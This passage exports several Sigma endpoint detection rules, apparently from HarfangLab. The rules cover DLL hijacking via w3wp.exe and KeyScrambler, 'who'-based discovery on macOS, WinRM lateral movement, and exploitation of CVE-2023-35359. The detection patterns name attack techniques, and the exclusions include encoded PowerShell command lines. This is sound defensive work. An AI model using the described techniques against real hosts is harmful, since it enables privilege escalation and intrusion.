"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.081015Z",
"creation_date": "2026-03-23T11:45:34.081017Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.081021Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://thehackernews.com/2023/05/n-korean-lazarus-group-targets.html",
"https://github.com/xforcered/WFH",
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_w3wp.yml",
"content": "title: DLL Hijacking via w3wp.exe\nid: 9761fea2-6074-4aef-b841-6fe34bf9c564\ndescription: |\n Detects potential Windows DLL Hijacking via w3wp.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers use this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://thehackernews.com/2023/05/n-korean-lazarus-group-targets.html\n - https://github.com/xforcered/WFH\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2023/05/25\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'w3wp.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: 'msvcr100.dll'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature:\n - 'Microsoft Windows'\n - 'Microsoft Corporation'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "9761fea2-6074-4aef-b841-6fe34bf9c564",
"rule_name": "DLL Hijacking via w3wp.exe",
"rule_description": "Detects potential Windows DLL Hijacking via w3wp.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers use this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2023-05-25",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "977590f0-1fe1-4403-aaa2-09929b3844b0",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.627531Z",
"creation_date": "2026-03-23T11:45:34.627533Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.627537Z",
"rule_level": "medium",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1033/",
"https://attack.mitre.org/techniques/T1049/"
],
"name": "t1033_who_macos.yml",
"content": "title: Current Logged In Users Discovered via Who\nid: 977590f0-1fe1-4403-aaa2-09929b3844b0\ndescription: |\n Detects the execution of the who command.\n Attackers may use it during the discovery phase of an attack to retrieve the list of users currently logged in.\n It is recommended to investigate the parent process and other potential malicious actions taken by it.\nreferences:\n - https://attack.mitre.org/techniques/T1033/\n - https://attack.mitre.org/techniques/T1049/\ndate: 2022/11/14\nmodified: 2026/02/11\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1033\n - attack.t1049\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.Behavior.Discovery\nlogsource:\n category: process_creation\n product: macos\ndetection:\n selection:\n Image: '/usr/bin/who'\n ParentImage|contains: '?'\n\n exclusion_image:\n - ParentImage:\n - '/Applications/DockWorks.app/Contents/Library/LoginItems/DockWorks_Process'\n - '/Applications/NinjaRMMAgent/programfiles/ninjarmm-macagent'\n - '/Library/ManageEngine/UEMS_Agent/bin/dcconfig'\n - '/Library/ManageEngine/UEMS_Agent/bin/dcinventory'\n - '/Library/ManageEngine/UEMS_Agent/bin/dcnotifyservice'\n - '/usr/local/munki/Python.framework/Versions/*/Resources/Python.app/Contents/MacOS/Python'\n - '/opt/homebrew/Cellar/oh-my-posh/*/bin/oh-my-posh'\n - '/opt/homebrew/Library/Homebrew/vendor/*/bin/ruby'\n - '/opt/homebrew/Cellar/zsh/*/bin/zsh'\n - '/opt/fusioninventory-agent/bin/perl'\n - '/Applications/Zscaler/Zscaler.app/Contents/PlugIns/ZscalerService'\n - '/Applications/Zscaler/Zscaler.app/Contents/PlugIns/ZscalerTunnel'\n - GrandparentImage:\n - '/Applications/TeamViewerHost.app/Contents/MacOS/TeamViewerHost'\n - '/Library/Application Support/AirWatch/hubd'\n - '/Applications/OrbStack.app/Contents/Frameworks/OrbStack Helper.app/Contents/MacOS/OrbStack Helper'\n - '/Applications/Visual Studio Code.app/Contents/Frameworks/Code Helper (Renderer).app/Contents/MacOS/Code Helper (Renderer)'\n - 
'/Applications/Visual Studio Code.app/Contents/MacOS/Electron'\n - '/Users/*/Library/Application Support/Foxit Software/Continuous/Addon/Foxit PDF Reader/Applications/FoxitReaderUpdateService.app/Contents/MacOS/updater'\n - '/Applications/Raycast.app/Contents/MacOS/Raycast'\n - '/Applications/JetBrains Toolbox.app/Contents/MacOS/jetbrains-toolbox'\n - '/Applications/TeamViewer.app/Contents/MacOS/TeamViewer'\n - '/Users/*/Applications/DataGrip.app/Contents/MacOS/datagrip'\n - '/Applications/Rider.app/Contents/MacOS/rider'\n - '/Applications/ESET Endpoint Security.app/Contents/MacOS/startd'\n - '/Applications/Cursor.app/Contents/Frameworks/Cursor Helper (Plugin).app/Contents/MacOS/Cursor Helper (Plugin)'\n - '/Library/ManageEngine/UEMS_Agent/bin/dcconfig'\n\n exclusion_commandline:\n CommandLine: 'who -m'\n\n exclusion_ancestors:\n ProcessAncestors|contains:\n - '|/Applications/Visual Studio Code.app/Contents/Frameworks/Code Helper.app/Contents/MacOS/Code Helper|'\n - '|/Applications/Warp.app/Contents/MacOS/stable|'\n - '|/System/Library/PrivateFrameworks/PackageKit.framework/Versions/A/XPCServices/package_script_service.xpc/Contents/MacOS/package_script_service'\n - '|/System/Library/PrivateFrameworks/PackageKit.framework/Versions/A/Resources/system_installd'\n\n exclusion_ocsinventory:\n - ParentCommandLine: '/usr/bin/perl /Applications/OCSNG.app/Contents/Resources/ocsinventory-agent'\n - GrandparentCommandLine: '/usr/bin/perl /Applications/OCSNG.app/Contents/Resources/ocsinventory-agent'\n\n exclusion_glpi:\n - ParentImage: '/Applications/GLPI-Agent/bin/perl'\n - GrandparentImage: '/Applications/GLPI-Agent/bin/perl'\n\n exclusion_jamf:\n - ParentImage:\n - '/usr/local/jamf/bin/jamf'\n - '/Library/Application Support/JAMF/Remote Assist/jamfRemoteAssistConnector'\n - GrandparentImage:\n - '/usr/local/jamf/bin/jamf'\n - '/Library/Application Support/JAMF/Remote Assist/jamfRemoteAssistConnector'\n\n exclusion_eset:\n CurrentDirectory: 
'/private/tmp/PKInstallSandbox.*/Scripts/com.eset.protection.*'\n\n exclusion_teamviewer:\n CurrentDirectory: '/Applications/TeamViewerHost.app/Contents/MacOS'\n\n exclusion_zoom:\n - ParentCommandLine|startswith: '/bin/bash /Library/InstallerSandboxes/.PKInstallSandboxManager/*activeSandbox/Scripts/us.zoom.pkg.videomeeting'\n - GrandparentCommandLine|startswith: '/bin/bash /Library/InstallerSandboxes/.PKInstallSandboxManager/*.activeSandbox/Scripts/us.zoom.pkg.videomeeting.'\n - CurrentDirectory|startswith: '/Library/InstallerSandboxes/.PKInstallSandboxManager/*.activeSandbox/Scripts/us.zoom.pkg.videomeeting'\n\n condition: selection and not 1 of exclusion_*\nlevel: medium\nconfidence: weak\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "977590f0-1fe1-4403-aaa2-09929b3844b0",
"rule_name": "Current Logged In Users Discovered via Who",
"rule_description": "Detects the execution of the who command.\nAttackers may use it during the discovery phase of an attack to retrieve the list of users currently logged in.\nIt is recommended to investigate the parent process and other potential malicious actions taken by it.\n",
"rule_creation_date": "2022-11-14",
"rule_modified_date": "2026-02-11",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1033",
"attack.t1049"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "9775a2f6-0523-4d7f-9270-ff581efbfee9",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.588908Z",
"creation_date": "2026-03-23T11:45:34.588912Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.588919Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.trendmicro.com/en_us/research/23/h/earth-estries-targets-government-tech-for-cyberespionage.html",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_keyscramblerlogon.yml",
"content": "title: DLL Hijacking via KeyScramblerLogon.exe\nid: 9775a2f6-0523-4d7f-9270-ff581efbfee9\ndescription: |\n Detects potential Windows DLL Hijacking via KeyScramblerLogon.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.trendmicro.com/en_us/research/23/h/earth-estries-targets-government-tech-for-cyberespionage.html\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2023/10/11\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'KeyScramblerLogon.exe'\n ImageLoaded|endswith: '\\KeyScramblerIE.dll'\n\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Program Files\\KeyScrambler\\'\n - '?:\\Program Files (x86)\\KeyScrambler\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Program Files\\KeyScrambler\\'\n - '?:\\Program Files (x86)\\KeyScrambler\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'QFX Software Corporation'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "9775a2f6-0523-4d7f-9270-ff581efbfee9",
"rule_name": "DLL Hijacking via KeyScramblerLogon.exe",
"rule_description": "Detects potential Windows DLL Hijacking via KeyScramblerLogon.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2023-10-11",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "97766810-30db-4302-9d9a-ee68259b35ed",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.076476Z",
"creation_date": "2026-03-23T11:45:34.076478Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.076482Z",
"rule_level": "medium",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://www.ired.team/offensive-security/lateral-movement/t1028-winrm-for-lateral-movement",
"https://bohops.com/2020/05/12/ws-management-com-another-approach-for-winrm-lateral-movement",
"https://attack.mitre.org/techniques/T1021/006/",
"https://attack.mitre.org/techniques/T1059/001/"
],
"name": "t1021_006_winrm_process_execution.yml",
"content": "title: Suspicious Lateral Movement via WinRM\nid: 97766810-30db-4302-9d9a-ee68259b35ed\ndescription: |\n Detects suspicious process being spawned via WinRM (child of winrshost).\n Windows Remote Management is a common Windows service that is used by PowerShell Remoting.\n This can be used by an attacker to move laterally within an organisation.\n It is recommended to investigate the process created and check the network type authentication at the same time.\nreferences:\n - https://www.ired.team/offensive-security/lateral-movement/t1028-winrm-for-lateral-movement\n - https://bohops.com/2020/05/12/ws-management-com-another-approach-for-winrm-lateral-movement\n - https://attack.mitre.org/techniques/T1021/006/\n - https://attack.mitre.org/techniques/T1059/001/\ndate: 2022/06/16\nmodified: 2025/04/14\nauthor: HarfangLab\ntags:\n - attack.lateral_movement\n - attack.t1021.006\n - attack.execution\n - attack.t1059.001\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Script.PowerShell\n - classification.Windows.Behavior.Lateralization\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n ParentImage|endswith: '?:\\Windows\\System32\\winrshost.exe'\n\n exclusion_conhost:\n Image: '?:\\Windows\\system32\\conhost.exe'\n\n exclusion_ansible:\n CommandLine:\n # ansible.windows.win_shell module – Execute shell commands on target hosts\n # https://docs.ansible.com/ansible/latest/collections/ansible/windows/win_shell_module.html\n #- '?:\\Windows\\system32\\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand 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'\n #- '?:\\Windows\\system32\\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand 
UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcA
QgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA='\n # ansible.windows.win_reboot module – Reboot a windows machine\n # https://docs.ansible.com/ansible/latest/collections/ansible/windows/win_reboot_module.html\n #- '?:\\Windows\\system32\\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand 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'\n\n # generic ansible\n - '?:\\Windows\\system32\\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAA*'\n\n # ansible winrm put_file()\n # https://github.com/ansible/ansible/blob/devel/lib/ansible/plugins/connection/winrm.py\n - '?:\\Windows\\system32\\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand *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*'\n - '?:\\Windows\\system32\\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand *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*'\n - '?:\\Windows\\system32\\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy 
Unrestricted -EncodedCommand *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*'\n\n # https://docs.ansible.com/ansible/latest/collections/ansible/windows/win_whoami_module.html\n - '?:\\windows\\system32\\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand dwBoAG8AYQBtAGkA'\n\n # https://docs.ansible.com/ansible/latest/collections/ansible/windows/win_reboot_module.html\n - '?:\\windows\\system32\\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand KABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAALQBDAGwAYQBzAHMATgBhAG0AZQAgAFcAaQBuADMAMgBfAE8AcABlAHIAYQB0AGkAbgBnAFMAeQBzAHQAZQBtACkALgBMAGEAcwB0AEIAbwBvAHQAVQBwAFQAaQBtAGUA'\n\n exclusion_common_commands:\n CommandLine:\n - '?:\\Windows\\system32\\cmd.exe /C java -version'\n - '?:\\windows\\system32\\cmd.exe /c set'\n - '?:\\Windows\\system32\\cmd.exe /C hostname'\n - '?:\\Windows\\system32\\cmd.exe /C echo ConnexionOK'\n\n exclusion_carl:\n CommandLine:\n - '?:\\WINDOWS\\system32\\cmd.exe /C powershell.exe -nonInteractive -command exit [int]!( Get-Service ?CARL*? -ErrorAction SilentlyContinue )'\n - '?:\\Windows\\system32\\cmd.exe /C powershell.exe -nonInteractive -command if (!( Get-Service ?CARL*? -ErrorAction SilentlyContinue ) ) { Exit 1 }'\n - '?:\\Windows\\system32\\cmd.exe /C powershell.exe -nonInteractive -command $srv=Get-Service ?CARL*? -ErrorAction SilentlyContinue; if ($srv) { echo $srv.status } else { Exit 1 }'\n - '?:\\WINDOWS\\system32\\cmd.exe /C powershell.exe -nonInteractive -command $srv=Get-Service ?CARL*? -ErrorAction SilentlyContinue; if ($srv) { Write-Output $srv.status; exit 0 } else { exit 1 }'\n - '?:\\Windows\\system32\\cmd.exe /C powershell.exe -nonInteractive -command $srv=Get-Service ?CARL*? 
-ErrorAction SilentlyContinue; if ($srv) { Write-Output $srv.name; exit 0 } else { exit 1 }'\n - '?:\\WINDOWS\\system32\\cmd.exe /C ?:\\Program Files\\Eclipse Adoptium\\jdk-*\\jre/bin/java -classpath ?:\\Users\\\\*\\bin\\rmtexe\\CARLAdminRmtexe-*.jar * -X GET http://localhost:9200/_*'\n\n condition: selection and not 1 of exclusion_*\nlevel: medium\nconfidence: weak\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "97766810-30db-4302-9d9a-ee68259b35ed",
"rule_name": "Suspicious Lateral Movement via WinRM",
"rule_description": "Detects suspicious process being spawned via WinRM (child of winrshost).\nWindows Remote Management is a common Windows service that is used by PowerShell Remoting.\nThis can be used by an attacker to move laterally within an organisation.\nIt is recommended to investigate the process created and check the network type authentication at the same time.\n",
"rule_creation_date": "2022-06-16",
"rule_modified_date": "2025-04-14",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution",
"attack.lateral_movement"
],
"rule_technique_tags": [
"attack.t1021.006",
"attack.t1059.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "979df31d-3f12-4fdd-aa5f-44a4867cf2d4",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.610488Z",
"creation_date": "2026-03-23T11:45:34.610491Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.610499Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://ssd-disclosure.com/ssd-advisory-file-history-service-fhsvc-dll-elevation-of-privilege/",
"https://nvd.nist.gov/vuln/detail/CVE-2023-35359",
"https://attack.mitre.org/techniques/T1068/"
],
"name": "t1068_cve_2023_35359_exploitation.yml",
"content": "title: File History Service CVE-2023-35359 Vulnerability Exploited\nid: 979df31d-3f12-4fdd-aa5f-44a4867cf2d4\ndescription: |\n Detects the exploitation of a local privilege escalation vulnerability in the File History Service (CVE-2023-35359).\n This vulnerability allows an attacker to make the File History load an arbitrary DLL as NT AUTHORITY\\SYSTEM, thus granting the attacker local SYSTEM privileges.\n It is recommended to analyze the loaded DLL as well as to look for traces of malicious behavior on the host.\n Remediative actions include quarantining the DLL as well as isolating the host.\nreferences:\n - https://ssd-disclosure.com/ssd-advisory-file-history-service-fhsvc-dll-elevation-of-privilege/\n - https://nvd.nist.gov/vuln/detail/CVE-2023-35359\n - https://attack.mitre.org/techniques/T1068/\ndate: 2023/09/04\nmodified: 2025/04/14\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.t1068\n - cve.2023-35359\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Exploit.CVE-2023-35359\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.PrivilegeEscalation\nlogsource:\n category: library_event\n product: windows\ndetection:\n selection:\n # C:\\Windows\\system32\\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc\n Image|endswith: '\\svchost.exe'\n ProcessCommandLine|contains: ' fhsvc'\n ImageLoaded|endswith: '\\msasn1.dll'\n\n filter_location:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n\n filter_signed:\n Signed: 'true'\n Signature:\n - 'Microsoft Windows'\n - 'Microsoft Windows Publisher'\n - 'Microsoft Corporation'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "979df31d-3f12-4fdd-aa5f-44a4867cf2d4",
"rule_name": "File History Service CVE-2023-35359 Vulnerability Exploited",
"rule_description": "Detects the exploitation of a local privilege escalation vulnerability in the File History Service (CVE-2023-35359).\nThis vulnerability allows an attacker to make the File History load an arbitrary DLL as NT AUTHORITY\\SYSTEM, thus granting the attacker local SYSTEM privileges.\nIt is recommended to analyze the loaded DLL as well as to look for traces of malicious behavior on the host.\nRemediative actions include quarantining the DLL as well as isolating the host.\n",
"rule_creation_date": "2023-09-04",
"rule_modified_date": "2025-04-14",
